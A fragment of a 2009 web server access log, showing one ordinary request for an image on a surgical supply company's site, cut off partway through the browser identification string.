124.13.162.240 - - [13/Nov/2009:05:07:15 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compati